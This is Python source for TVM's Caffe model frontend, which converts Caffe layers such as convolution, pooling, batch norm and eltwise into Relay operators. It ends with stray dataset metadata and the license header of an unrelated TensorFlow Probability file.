self.changed_layers = None
self.convert_map = {
"BatchNorm": self.convert_batch_norm,
"Concat": self.convert_concat,
"Convolution": self.convert_conv,
"Crop": self.convert_crop,
"Deconvolution": self.convert_deconv,
"Dropout": self.convert_dropout,
"Eltwise": self.convert_eltwise,
"Embed": self.convert_embed,
"Flatten": self.convert_flatten,
"InnerProduct": self.convert_innerproduct,
"Input": None,
"LRN": self.convert_lrn,
"Permute": self.convert_permute,
"Pooling": self.convert_pooling,
"Power": self.convert_power,
"PReLU": self.convert_prelu,
"ReLU": self.convert_relu,
"Reshape": self.convert_reshape,
"Scale": self.convert_scale,
"Sigmoid": self.convert_sigmoid,
"Slice": self.convert_slice,
"Softmax": self.convert_softmax,
"TanH": self.convert_tanh,
"Reduction": self.convert_reduction,
}
def convert_flatten(self, op):
"""Convert Flatten layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
flatten_params = op.flatten_param.axis
assert flatten_params == 1, "flatten axis should be 1"
out = _op.nn.batch_flatten(in_expr)
return out
def convert_eltwise(self, op):
"""Convert Eltwise layer"""
inputs = op.bottom
        assert len(inputs) >= 2, "there should be at least 2 input tensors"
        # gathering the initial 2 input expressions
lhs_expr = self.exp_tab.get_expr(inputs[0])
rhs_expr = self.exp_tab.get_expr(inputs[1])
lhs_shape = _infer_shape(lhs_expr)
rhs_shape = _infer_shape(rhs_expr)
assert lhs_shape == rhs_shape, "input tensors shape should be equal"
eltwise_params = op.eltwise_param
eltwise_type_dict = ["PROD", "SUM", "MAX"]
eltwise_type = eltwise_params.operation
coeff = list(eltwise_params.coeff)
if eltwise_type_dict[eltwise_type] == "PROD":
out = _op.multiply(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
out = _op.multiply(out, extra_expr)
elif eltwise_type_dict[eltwise_type] == "SUM":
if coeff:
left_coeff_expr = self.exp_tab.new_const(np.asarray(coeff[0], np.float32))
right_coeff_expr = self.exp_tab.new_const(np.asarray(coeff[1], np.float32))
lhs_expr_scale = _op.multiply(lhs_expr, left_coeff_expr)
rhs_expr_scale = _op.multiply(rhs_expr, right_coeff_expr)
out = _op.add(lhs_expr_scale, rhs_expr_scale)
else:
out = _op.add(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
if coeff:
coeff_expr = self.exp_tab.new_const(np.asarray(coeff[i + 2], np.float32))
extra_expr_scale = _op.multiply(extra_expr, coeff_expr)
out = _op.add(out, extra_expr_scale)
else:
out = _op.add(out, extra_expr)
elif eltwise_type_dict[eltwise_type] == "MAX":
out = _op.maximum(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
out = _op.maximum(out, extra_expr)
else:
raise tvm.error.OpNotImplemented(
"eltwise_type {} is not supported for frontend Caffe.".format(eltwise_type)
)
return out
def _parse_conv_params(self, op):
"""Parse the parameters of Convolution and Deconvolution layer"""
nonzone = lambda val, pos, dflt: val[pos] if pos < len(val) else dflt
conv_params = op.convolution_param
params = dict()
# parse kernel size
if conv_params.kernel_h > 0 or conv_params.kernel_w > 0:
params["kernel_size"] = (conv_params.kernel_h, conv_params.kernel_w)
else:
ksize_h = nonzone(conv_params.kernel_size, 0, 1)
ksize_w = nonzone(conv_params.kernel_size, 1, ksize_h)
params["kernel_size"] = (ksize_h, ksize_w)
# parse padding size
if conv_params.pad_h > 0 or conv_params.pad_w > 0:
params["padding"] = (conv_params.pad_h, conv_params.pad_w)
else:
pad_h = nonzone(conv_params.pad, 0, 0)
pad_w = nonzone(conv_params.pad, 1, pad_h)
params["padding"] = (pad_h, pad_w)
# parse stride size
if conv_params.stride_h > 0 or conv_params.stride_w > 0:
params["strides"] = (conv_params.stride_h, conv_params.stride_w)
else:
stride_h = nonzone(conv_params.stride, 0, 1)
stride_w = nonzone(conv_params.stride, 1, stride_h)
params["strides"] = (stride_h, stride_w)
# parse dilation size
if hasattr(conv_params, "dilation") and len(conv_params.dilation) > 0:
dilation = " ".join(str(d) for d in conv_params.dilation)
dilation = tuple(map(int, dilation.split(" ")))
params["dilation"] = dilation
if len(dilation) == 1:
params["dilation"] = (dilation[0], dilation[0])
params["kernel_layout"] = "OIHW"
params["data_layout"] = "NCHW"
params["groups"] = conv_params.group
params["channels"] = conv_params.num_output
return params
def convert_batch_norm(self, op):
"""Convert BatchNorm layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
n, c, h, w = _infer_shape(in_expr)
if op.name in self.new_bn:
mean, var, eps, gamma, beta = self.new_bn[op.name]
mean_expr = self.exp_tab.new_const(mean, dtype="float32")
var_expr = self.exp_tab.new_const(var, dtype="float32")
gamma_expr = self.exp_tab.new_const(gamma, dtype="float32")
beta_expr = self.exp_tab.new_const(beta, dtype="float32")
out = _op.nn.batch_norm(
in_expr, gamma_expr, beta_expr, mean_expr, var_expr, epsilon=eps, scale=True
)
else:
weight_bias_blobs = self.init_layer_dict[op.name].blobs
mean = np.asarray(weight_bias_blobs[0].data, np.float32)
var = np.asarray(weight_bias_blobs[1].data, np.float32)
if len(weight_bias_blobs) == 2:
mean = np.repeat(mean, h * w).reshape((c, h, w))
mean = np.expand_dims(mean, 0).repeat(n, axis=0)
mean_expr = self.exp_tab.new_const(mean, dtype="float32")
var = np.repeat(var, h * w).reshape((c, h, w))
var = np.expand_dims(var, 0).repeat(n, axis=0)
var_expr = self.exp_tab.new_const(var, dtype="float32")
tmp_out = _op.multiply(in_expr, mean_expr)
out = _op.add(tmp_out, var_expr)
return out
else:
scale = np.asarray(weight_bias_blobs[2].data, np.float32)
if scale:
scale = 1 / scale
mean_expr = self.exp_tab.new_const(mean * scale, dtype="float32")
var_expr = self.exp_tab.new_const(var * scale, dtype="float32")
            # caffe bn layer does not support scale
gamma_expr = self.exp_tab.new_const(
np.ones(mean.shape, dtype=np.float32), dtype="float32"
)
beta_expr = self.exp_tab.new_const(
np.zeros(mean.shape, dtype=np.float32), dtype="float32"
)
bn_params = op.batch_norm_param.eps
out = _op.nn.batch_norm(
in_expr, gamma_expr, beta_expr, mean_expr, var_expr, epsilon=bn_params, scale=False
)
return out[0]
def convert_scale(self, op):
"""Convert Scale layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
weight_bias_blobs = self.init_layer_dict[op.name].blobs
params = dict()
params["bias"] = op.scale_param.bias_term
params["axis"] = op.scale_param.axis
gamma = np.asarray(weight_bias_blobs[0].data, np.float32)
gamma_expr = self.exp_tab.new_const(gamma, dtype="float32")
if params["bias"]:
beta = np.asarray(weight_bias_blobs[1].data, np.float32)
beta_expr = self.exp_tab.new_const(beta, dtype="float32")
else:
beta_expr = self.exp_tab.new_const(
np.zeros(gamma.shape, dtype=np.float32), dtype="float32"
)
_, c, _, _ = _infer_shape(in_expr)
gamma_expr = _op.reshape(gamma_expr, newshape=(1, c, 1, 1))
beta_expr = _op.reshape(beta_expr, newshape=(1, c, 1, 1))
out = _op.multiply(in_expr, gamma_expr)
out = _op.add(out, beta_expr)
return out
def convert_concat(self, op):
"""Convert Concat layer"""
inputs = op.bottom
in_expr = (self.exp_tab.get_expr(inputs[i]) for i in range(len(inputs)))
c_params = dict()
c_params["axis"] = op.concat_param.axis
out = _op.concatenate(in_expr, axis=c_params["axis"])
return out
def convert_reshape(self, op):
"""Convert Reshape layer"""
inputs = op.bottom
input_name = inputs[0]
reshape_param = op.reshape_param
dims = list(reshape_param.shape.dim)
in_expr = self.exp_tab.get_expr(input_name)
input_shape = list(_infer_shape(in_expr))
start_axis = int(reshape_param.axis)
if start_axis < 0:
start_axis = len(input_shape) + start_axis + 1
num_axes = int(reshape_param.num_axes)
end_axis = len(input_shape)
if num_axes != -1:
end_axis = start_axis + num_axes
left_shape = input_shape[:start_axis]
if end_axis == len(input_shape):
center_shape = input_shape[start_axis:]
right_shape = []
else:
center_shape = input_shape[start_axis:end_axis]
right_shape = input_shape[end_axis:]
for idx, dim in enumerate(dims):
if dim == 0:
dims[idx] = center_shape[idx]
tmp = np.random.rand(*center_shape)
tmp = np.reshape(tmp, dims)
center_shape = list(tmp.shape)
newshape = left_shape + center_shape + right_shape
out = _op.reshape(in_expr, newshape=newshape)
return out
def convert_softmax(self, op):
"""Convert Softmax layer"""
inputs = op.bottom
assert len(inputs) == 1, "input tensors length should be 1"
input_name = inputs[0]
in_expr = self.exp_tab.get_expr(input_name)
softmax_param = op.softmax_param
parmas = {"axis": softmax_param.axis}
out = _op.nn.softmax(in_expr, **parmas)
return out
def convert_conv(self, op):
"""Convert Convolution layer"""
params = self._parse_conv_params(op)
weight_bias_blobs = self.init_layer_dict[op.name].blobs
conv_params = op.convolution_param
inputs = op.bottom
# process weight and bias blobs
weight, bias = None, None
if len(weight_bias_blobs) > 1:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
kh, kw = params["kernel_size"]
weight_shape = [conv_params.num_output, -1, kh, kw]
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, weight_shape)
else:
raise Exception("No weight value of layer {} in caffemodel".format(op.name))
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.nn.conv2d(data=in_expr, weight=weight_expr, **params)
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.nn.bias_add(out, bias_expr)
return out
def convert_pooling(self, op):
"""Convert Pooling layer"""
inputs = op.bottom
input_name = inputs[0]
pool_params = op.pooling_param
pool_type_dict = ["MAX", "AVE", "STOCHASTIC"]
params = dict()
# parse pool type: 0: MAX, 1: AVE, 2: STOCHASTIC
pool_type = pool_params.pool
# parse kernel size
if pool_params.kernel_h > 0 or pool_params.kernel_w > 0:
params["pool_size"] = (pool_params.kernel_h, pool_params.kernel_w)
else:
params["pool_size"] = (pool_params.kernel_size, pool_params.kernel_size)
# parse padding size
if pool_params.pad_h > 0 or pool_params.pad_w > 0:
params["padding"] = (pool_params.pad_h, pool_params.pad_w)
else:
params["padding"] = (pool_params.pad, pool_params.pad)
# parse stride size
if pool_params.stride_h > 0 or pool_params.stride_w > 0:
params["strides"] = (pool_params.stride_h, pool_params.stride_w)
else:
params["strides"] = (pool_params.stride, pool_params.stride)
params["ceil_mode"] = True
if hasattr(pool_params, "round_mode"):
params["ceil_mode"] = pool_params.round_mode == "CEIL"
in_expr = self.exp_tab.get_expr(input_name)
if pool_type_dict[pool_type] == "MAX":
if pool_params.global_pooling:
out = _op.nn.global_max_pool2d(in_expr)
else:
if len(op.top) == 1:
out = _op.nn.max_pool2d(in_expr, **params)
elif len(op.top) == 2:
out1 = _op.nn.max_pool2d_with_argmax(in_expr, **params)
out2 = _op.vision.max_pool2d_location(in_expr, **params)
return _expr.Tuple((out1, out2))
elif pool_type_dict[pool_type] == "AVE": # AVE
if pool_params.global_pooling:
out = _op.nn.global_avg_pool2d(in_expr)
else:
params["count_include_pad"] = True
out = _op.nn.avg_pool2d(in_expr, **params)
else:
raise tvm.error.OpNotImplemented(
"Operator {} is not supported for frontend Caffe.".format(
pool_type_dict[pool_type] + " pool"
)
)
return out
def convert_lrn(self, op):
"""Convert LRN layer"""
inputs = op.bottom
input_name = inputs[0]
params = dict()
lrn_params = op.lrn_param
params["size"] = lrn_params.local_size
params["bias"] = lrn_params.k
params["alpha"] = lrn_params.alpha
params["beta"] = lrn_params.beta
in_expr = self.exp_tab.get_expr(input_name)
out = _op.nn.lrn(in_expr, **params)
return out
def convert_innerproduct(self, op):
"""Convert InnerProduct layer"""
inputs = op.bottom
weight_bias_blobs = self.init_layer_dict[op.name].blobs
dense_params = op.inner_product_param
params = dict()
params["num_output"] = dense_params.num_output
params["bias"] = dense_params.bias_term
params["axis"] = dense_params.axis
if params["axis"] != 1:
raise Exception("Only support 2D InnerProduct")
# process weight and bias blobs
weight, bias = None, None
if params["bias"]:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, (params["num_output"], -1))
weight_shape = weight_value.shape
else:
raise Exception("No weight value of layer {} in caffemodel".format(op.name))
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
in_reshape = _op.reshape(data=in_expr, newshape=(-1, weight_shape[-1]))
out = _op.nn.dense(data=in_reshape, weight=weight_expr)
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.nn.bias_add(out, bias_expr, axis=params["axis"])
return out
def convert_dropout(self, op):
"""Convert Dropout layer"""
inputs = op.bottom
input_name = inputs[0]
params = dict()
dropout_params = op.dropout_param
params["rate"] = dropout_params.dropout_ratio
in_expr = self.exp_tab.get_expr(input_name)
out = _op.nn.dropout(in_expr, **params)
return out
def convert_relu(self, op):
"""Convert ReLU layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
negative_slope = op.relu_param.negative_slope
if negative_slope:
out = _op.nn.leaky_relu(in_expr, negative_slope)
return out
out = _op.nn.relu(in_expr)
return out
def convert_prelu(self, op):
"""Convert PReLU layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
alpha = self.init_layer_dict[op.name].blobs[0].data
alpha = np.asarray(alpha, np.float32)
alpha = self.exp_tab.new_const(alpha, dtype="float32")
axis = 1
out = _op.nn.prelu(in_expr, alpha, axis=axis)
return out
def convert_deconv(self, op):
"""Convert Deconvolution layer"""
params = self._parse_conv_params(op)
weight_bias_blobs = self.init_layer_dict[op.name].blobs
conv_params = op.convolution_param
inputs = op.bottom
# process weight and bias blobs
weight, bias = None, None
if len(weight_bias_blobs) > 1:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
kh, kw = params["kernel_size"]
weight_shape = [-1, conv_params.num_output, kh, kw]
if not weight.data:
if conv_params.weight_filler:
_filler = conv_params.weight_filler.value
weight_value = np.full(weight.shape.dim, _filler, np.float32)
else:
raise tvm.error.OpAttributeInvalid("At least weight_filler must be given")
else:
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, weight_shape)
            # weight shape is in relay's IOHW format, we need it to be OIHW
weight_value = np.transpose(weight_value, [1, 0, 2, 3])
else:
raise tvm.error.OpAttributeRequired(
"No weight value of layer {} in caffemodel".format(op.name)
)
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
groups = params["groups"]
channels = params["channels"]
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
if groups > channels:
raise tvm.error.OpAttributeInvalid(
"Groups cannot be larger than the number of input channels"
)
if groups == channels:
inputs_expr = _op.split(in_expr, groups, axis=1)
# changing split axis to 0, according to PR #9336
weights_expr = _op.split(weight_expr, groups, axis=0)
            # Prevent creating a Concat layer with too many tensors (> 16)
q = groups >> 4
r = groups % 16
params["groups"] = 1
params["channels"] = 1
out = []
for lc in range(q):
_outputs = []
_inputs = [inputs_expr[i] for i in range(lc << 4, (lc << 4) + 16)]
_weights = [weights_expr[i] for i in range(lc << 4, (lc << 4) + 16)]
for (i, w) in zip(_inputs, _weights):
_out = _op.nn.conv2d_transpose(data=i, weight=w, **params)
if bias:
_out = _op.nn.bias_add(_out, bias_expr)
_outputs.append(_out)
out.append(_op.concatenate(_outputs, axis=1))
if r != 0:
_outputs = []
_inputs = [inputs_expr[i] for i in range(groups - r, groups)]
_weights = [weights_expr[i] for i in range(groups - r, groups)]
for (i, w) in zip(_inputs, _weights):
_out = _op.nn.conv2d_transpose(data=i, weight=w, **params)
if bias:
_out = _op.nn.bias_add(_out, bias_expr)
_outputs.append(_out)
out.append(_op.concatenate(_outputs, axis=1))
out = _op.concatenate(out, axis=1)
elif groups == 1:
out = _op.nn.conv2d_transpose(data=in_expr, weight=weight_expr, **params)
if bias:
out = _op.nn.bias_add(out, bias_expr)
else:
raise tvm.error.OpAttributeInvalid("Unable to handle.")
return out
def convert_slice(self, op):
"""Convert Slice layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
output_num = len(op.top)
slice_params = op.slice_param
axis = int(slice_params.axis)
indices_or_sections = list([int(s) for s in slice_params.slice_point])
if len(indices_or_sections) == 0:
indices_or_sections = output_num
else:
indices_or_sections = sorted(indices_or_sections)
out = _op.split(in_expr, indices_or_sections=indices_or_sections, axis=axis)
return out
def convert_sigmoid(self, op):
"""Convert Sigmoid layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.sigmoid(in_expr)
return out
def convert_tanh(self, op):
"""Convert TanH layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.tanh(in_expr)
return out
def convert_reduction(self, op):
"""Convert Reduction layer"""
reduction_dic = ["NOP", "SUM", "ASUM", "SUMSQ", "MEAN"]
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
method = op.reduction_param.operation
axis = op.reduction_param.axis
coeff = op.reduction_param.coeff
coeff_expr = self.exp_tab.new_const(np.asarray(coeff, np.float32))
num_axes = len(_infer_shape(in_expr))
# Currently, only reduction along ALL "tail" axes is supported in Caffe;
# reduction of axis M through N, where N < num_axes - 1, is unsupported.
if 0 < axis < (num_axes - 1):
for _axis in reversed(range(axis + 1, num_axes)):
in_expr = _op.sum(in_expr, axis=_axis)
in_expr = _op.squeeze(in_expr)
if reduction_dic[method] == "SUM":
out = _op.sum(in_expr, axis=axis)
elif reduction_dic[method] == "MEAN":
out = _op.mean(in_expr, axis=axis)
elif reduction_dic[method] == "ASUM":
in_expr = _op.abs(in_expr)
out = _op.sum(in_expr, axis=axis)
elif reduction_dic[method] == "SUMSQ":
in_expr = _op.multiply(in_expr, in_expr)
out = _op.sum(in_expr, axis=axis)
else:
raise tvm.error.OpAttributeInvalid(
"reduction method:{} is invalid in Caffe frontend.".format(method)
)
if float(coeff) != 1.0:
out = _op.multiply(out, coeff_expr)
return out
def convert_crop(self, op):
"""Convert Crop layer"""
inputs = op.bottom
assert len(inputs) == 2, "Need two inputs of Crop layer"
in_expr_a = self.exp_tab.get_expr(inputs[0])
in_expr_b = self.exp_tab.get_expr(inputs[1])
# parse crop params
crop_params = op.crop_param
axis = int(getattr(crop_params, "axis", 2))
offset = list(getattr(crop_params, "offset", 0))
# expand offset to (offset1, offset2, ...)
in_a_shape = _infer_shape(in_expr_a)
num_to_crop = len(in_a_shape) - axis
if not offset:
offset = [0] * num_to_crop
if len(offset) == 1:
offset = offset * num_to_crop
elif len(offset) != num_to_crop:
raise Exception("No matching the number between axis and offset!")
slice_end = in_a_shape
slice_start = [0] * len(in_a_shape)
for i in range(num_to_crop):
slice_start[i + axis] = offset[i]
to_crop_axis = list(range(len(in_a_shape)))
to_crop_axis = to_crop_axis[axis:]
# secondly, crop in_expr_a by in_expr_b
in_expr_a_stride = _op.strided_slice(in_expr_a, slice_start, slice_end)
out = _op.slice_like(in_expr_a_stride, in_expr_b, axes=to_crop_axis)
return out
def convert_permute(self, op):
"""Convert Permute layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
# parse permute params
permute_param = op.permute_param
axes = list(getattr(permute_param, "order", 0))
out = _op.transpose(in_expr, axes)
return out
def convert_embed(self, op):
"""Convert Embed layer"""
inputs = op.bottom
embed_param = op.embed_param
num_output = embed_param.num_output
input_dim = embed_param.input_dim
bias_term = embed_param.bias_term
weight_bias_blobs = self.init_layer_dict[op.name].blobs
weight, bias = None, None
if bias_term:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
assert weight and bias
else:
weight = weight_bias_blobs[0]
assert weight
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, [input_dim, num_output])
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
input_shape = _infer_shape(in_expr)
input_count = 1
for dim in input_shape:
input_count *= dim
index = _op.cast(in_expr, "int32")
out = _op.take(weight_expr, index, axis=0)
if bias_term:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.reshape(out, [input_count, num_output])
out = _op.add(out, bias_expr)
out_shape = list(input_shape)
out_shape.append(num_output)
out = _op.reshape(out, out_shape)
return out
def convert_power(self, op):
"""Convert Power layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
power = _expr.const(op.power_param.power)
scale = _expr.const(op.power_param.scale)
shift = _expr.const(op.power_param.shift)
out = _op.multiply(in_expr, scale)
out = _op.add(out, shift)
out = _op.power(out, power)
return out
def check_unsupported_ops(self):
"""Check unsupported Caffe ops in our converter."""
unsupported_ops_set = set()
include_layer = dict()
for pl in self.predict_layer:
if pl.type not in include_layer:
include_layer[pl.type] = 1
else:
include_layer[pl.type] = include_layer[pl.type] + 1
for pl in self.predict_layer:
op_name = pl.type
if op_name not in self.convert_map:
unsupported_ops_set.add(op_name)
if unsupported_ops_set:
msg = "The following operators are not supported in frontend " "Caffe: {}"
ops = str(list(unsupported_ops_set)).strip("[,]")
raise tvm.error.OpNotImplemented(msg.format(ops))
def fuse_op(self, layers):
"""Fusing the BatchNorm and Scale layer"""
bn, scale = layers["bn"], layers["scale"]
# bn params
bn_weight_bias_blobs = self.init_layer_dict[bn.name].blobs
bn_scale = np.asarray(bn_weight_bias_blobs[2].data, np.float32)
if bn_scale:
bn_scale = 1 / bn_scale
bn_mean = np.asarray(bn_weight_bias_blobs[0].data, np.float32) * bn_scale
bn_var = np.asarray(bn_weight_bias_blobs[1].data, np.float32) * bn_scale
bn_eps = bn.batch_norm_param.eps
# scale params
scale_weight_bias_blobs = self.init_layer_dict[scale.name].blobs
scale_gamma = np.asarray(scale_weight_bias_blobs[0].data, np.float32)
scale_bias = scale.scale_param.bias_term
if scale_bias:
scale_beta = np.asarray(scale_weight_bias_blobs[1].data, np.float32)
else:
scale_beta = np.zeros(scale_gamma.shape, dtype=np.float32)
# new params
self.new_bn[bn.name] = [bn_mean, bn_var, bn_eps, scale_gamma, scale_beta]
return bn
def op_fuse(self):
"""fuse bn and scale"""
new_layers = []
temp_layers = {}
changed_layers = {}
for index, pl in enumerate(self.predict_layer):
op_type = pl.type
if op_type == "Input":
new_layers.append(pl)
continue
elif op_type == "BatchNorm":
if (index != len(self.predict_layer) - 1) and (
self.predict_layer[index + 1].type == "Scale"
):
temp_layers["bn"] = pl
continue
else:
new_layers.append(pl)
temp_layers.clear()
elif op_type == "Scale":
if self.predict_layer[index - 1].type == "BatchNorm":
temp_layers["scale"] = pl
else:
new_layers.append(pl)
temp_layers.clear()
else:
temp_layers.clear()
if len(temp_layers) == 2:
layer = self.fuse_op(temp_layers)
new_layers.append(layer)
changed_layers[temp_layers["scale"].name] = temp_layers["bn"].name
for idx, plt in enumerate(pl.bottom):
if plt in changed_layers:
pl.bottom[idx] = changed_layers[plt]
if op_type not in ["BatchNorm", "Scale"]:
new_layers.append(pl)
self.predict_layer = new_layers
self.changed_layers = changed_layers
def convert_op_to_relay(self):
"""Convert Caffe ops to relay ops"""
for pl in self.predict_layer:
op_type = pl.type
if op_type == "Input":
continue
output_tensors = pl.top
ret = self.convert_map[op_type](pl)
if len(output_tensors) == 1:
self.exp_tab.set_expr(output_tensors[0], ret)
else:
for idx, output_tensor in enumerate(output_tensors):
self.exp_tab.set_expr(output_tensor, ret[idx])
def _rebuild_layers(predict_layer):
"""Rebuild caffe layer. If the the caffe net include in-place layers, repalce its top
with its name and update the bottom of other layer that is related to it.
"""
# dict of input name that will be changed to new name
changed_top_dict = dict()
for pl in predict_layer:
if pl.type == "Input":
continue
        # if the current layer has a single input and output and the input equals the output,
        # it means that the layer operates "in-place"
if len(pl.top) == 1 and len(pl.bottom) == 1:
if pl.top[0] == pl.bottom[0]:
# change current layer's input firstly
if pl.bottom[0] in changed_top_dict:
pl.bottom[0] = changed_top_dict[pl.bottom[0]]
# update "change" dict
changed_top_dict[pl.top[0]] = pl.name
# change current layer's output to its name
pl.top[0] = pl.name
else:
if pl.bottom[0] in changed_top_dict:
pl.bottom[0] = changed_top_dict[pl.bottom[0]]
        # if the layer does not have a single input and a single output
else:
for index, plt in enumerate(pl.bottom):
if plt in changed_top_dict:
pl.bottom[index] = changed_top_dict[plt]
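# Editor's note: a toy illustration of the in-place rewrite performed above, using a
# small stand-in object instead of a real caffe layer message. It is illustrative
# only and not part of the original frontend; nothing calls it.
def _rebuild_layers_demo():
    """Show how an in-place ReLU gets its top renamed and downstream bottoms updated."""

    class _FakeLayer:  # minimal stand-in exposing name/type/top/bottom
        def __init__(self, name, type_, bottom, top):
            self.name, self.type, self.bottom, self.top = name, type_, bottom, top

    conv = _FakeLayer("conv1", "Convolution", ["data"], ["conv1"])
    relu = _FakeLayer("relu1", "ReLU", ["conv1"], ["conv1"])  # in-place layer
    pool = _FakeLayer("pool1", "Pooling", ["conv1"], ["pool1"])
    _rebuild_layers([conv, relu, pool])
    # relu.top is now ["relu1"] and pool.bottom is now ["relu1"]
    return relu.top, pool.bottom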
def _get_inputs_outputs(predict_layer):
"""Obtain Caffe model's inputs and outpus"""
# model inputs / outputs
model_inputs = list()
model_outputs = list()
    # Tensors that appear as some layer's bottom cannot be model outputs
not_outputs = set()
for pl in predict_layer:
if pl.type == "Input":
assert len(pl.top) == 1, "The number of Input layer's output is more than 1."
model_inputs.append(pl.top[0])
for i in pl.bottom:
not_outputs.add(i)
for pl in predict_layer:
if len(pl.bottom) > 0:
for t in pl.top:
if t not in not_outputs:
model_outputs.append(t)
return model_inputs, model_outputs
def from_caffe(init_net, predict_net, shape_dict, dtype_dict):
"""Convert from caffe model into compatible relay Function.
Parameters
----------
init_net : caffe_pb2.NetParameter
caffemodel
predict_net : caffe_pb2.NetParameter
caffe prototxt
shape_dict : dict of str to int list/tuple
Input shapes of the model.
dtype_dict : dict of str to str
Input types of the model.
Returns
-------
mod : tvm.IRModule
The relay module for compilation.
params : dict of str to tvm.NDArray
The parameter dict to be used by relay
"""
old_caffe = False
if len(predict_net.input) != 0: # old caffe version
old_caffe = True
model_inputs = list(predict_net.input)
predict_layer = predict_net.layer
    # replace each layer's top with its name and update other layers' bottoms
_rebuild_layers(predict_layer)
# obtain inputs and outputs of Net
if old_caffe:
_, model_outputs = _get_inputs_outputs(predict_layer)
else:
model_inputs, model_outputs = _get_inputs_outputs(predict_layer)
exp_tab = ExprTable()
for in_name in model_inputs:
shape = shape_dict[in_name] if in_name in shape_dict else None
dtype = dtype_dict[in_name] if in_name in dtype_dict else "float32"
exp_tab.set_expr(in_name, _expr.var(in_name, shape=shape, dtype=dtype))
if list(init_net.layer):
init_layer = init_net.layer
else:
init_layer = init_net.layers
init_layer_dict = {il.name: il for il in init_layer}
# op code in model
op_converter = OperatorConverter(init_layer_dict, predict_layer, exp_tab)
op_converter.check_unsupported_ops()
op_converter.op_fuse()
op_converter.convert_op_to_relay()
# params and outputs
params = {k: _nd.array(np.array(v)) for k, v in exp_tab.params.items()}
outputs = list()
for n in model_outputs:
if n in op_converter.changed_layers:
n = op_converter.changed_layers[n]
outputs.append(exp_tab.get_expr(n))
outputs = outputs[0] if len(outputs) == 1 else _expr.Tuple(outputs)
func = _function.Function(analysis.free_vars(outputs), outputs)
mod = IRModule.from_expr(func)
return mod, params
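A rough end-to-end usage sketch for the converter defined above follows. The file names, input blob name and shape, and the "llvm" target are placeholders rather than anything taken from this module, and parsing the protobuf messages assumes pycaffe's generated caffe_pb2 is available.

from google.protobuf import text_format
from caffe.proto import caffe_pb2  # requires pycaffe's generated protos
from tvm import relay
from tvm.relay.frontend.caffe import from_caffe

init_net = caffe_pb2.NetParameter()
predict_net = caffe_pb2.NetParameter()
with open("model.caffemodel", "rb") as f:  # placeholder file name
    init_net.ParseFromString(f.read())
with open("model.prototxt", "r") as f:  # placeholder file name
    text_format.Merge(f.read(), predict_net)

shape_dict = {"data": (1, 3, 224, 224)}  # assumed input blob name and shape
dtype_dict = {"data": "float32"}
mod, params = from_caffe(init_net, predict_net, shape_dict, dtype_dict)
lib = relay.build(mod, target="llvm", params=params)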
| 37.781312
| 99
| 0.592402
|
0bdf063df4e23fe48a69f49208f757dbb8660194
| 9,021
|
py
|
Python
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
